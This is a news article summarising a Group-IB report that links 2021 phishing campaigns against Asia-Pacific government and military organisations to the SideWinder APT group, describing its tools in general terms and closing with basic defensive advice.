SideWinder is apparently an India-based advanced persistent threat (APT) group known for spreading malware, infiltrating networks, and stealing sensitive information.
Security researchers at Group-IB have finally been successful in connecting a series of phishing campaigns between June and November 2021 to an Indian Advanced Persistent Threat (APT) group, SideWinder.
The suspected state-sponsored group has targeted 61 government, military, law enforcement, and other organizations across the Asia-Pacific region, according to a report from Group-IB.
Also known as Rattlesnake, Hardcore Nationalist (HN2), and T-APT4, the group is considered one of the oldest national-state groups, going as far back as 2012. In January 2020, the group was found to be infecting Android devices with malware through the Play Store.
In another attack reported in February 2022, SideWinder was observed collaborating with another group called ModifiedElephant and targeting unsuspecting users by planting incriminating evidence on their devices.
In June of last year, the group’s custom tool, SideWinder.AntiBot.Script, was used in previously undocumented phishing attacks against Pakistani organizations. The group was also linked to an attack on the Maldivian government in 2020.
Like many others, SideWinder also uses spear phishing as its initial attack vector, sending phishing emails containing malicious attachments or URLs to victims. Two of these campaigns featured emails in which the group impersonated a cryptocurrency firm, said Group-IB.
If a user clicks on the link attachment, a malicious document, an LNK file, or a payload is subsequently downloaded onto their computer. The LNK file downloads an HTA file, which then downloads the payload. This payload could be either a remote access Trojan (RAT) or an information stealer, according to Group-IB’s technical analysis.
Further, two new custom-made SideWinder tools discovered by Group-IB during the campaign were SideWinder.RAT.b, a RAT, and SideWinder.StealerPy, an info-stealer.
The info-stealer is capable of collecting Google Chrome browsing history, credentials saved in the browser, the list of folders in the directory, meta-information, the contents of docx, pdf, and txt files and more.
The APT group’s motive seems to be linked to India’s cryptocurrency market, Group-IB’s report speculates.
“Interestingly, Group-IB analysts discovered two phishing projects mimicking crypto companies. SideWinder’s growing interest in cryptocurrency could be linked to the recent attempts to regulate the crypto market in India.”
However, Group-IB cannot confirm how many, if any, of these phishing campaigns were successful. Nevertheless, users and organizations must take precautions against SideWinder’s attack, starting with the following steps:
Keep your software up to date: Make sure your operating system and all your software are up to date with the latest security patches. This will help protect you against known vulnerabilities that could be exploited by SideWinder.
Use strong passwords: Use complex and unique passwords for all your accounts and enable two-factor authentication whenever possible. This can help prevent unauthorized access to your accounts and make it more difficult for SideWinder to gain access.
Be cautious of phishing emails: SideWinder often uses phishing emails to trick users into clicking on a malicious link or downloading a malicious attachment. Be cautious of emails from unknown senders, and do not click on links or download attachments unless you are sure they are safe.
Use anti-malware software: Install and use anti-malware software to help detect and prevent SideWinder attacks. Make sure your anti-malware software is up to date and set to automatically scan your system on a regular basis.
Limit access to sensitive information: Limit the number of people who have access to sensitive information, and use encryption to protect data that is transmitted or stored.
Train employees: Train employees on how to recognize and avoid SideWinder attacks. Educate them on safe browsing habits, how to identify phishing emails, and the importance of keeping software up to date.
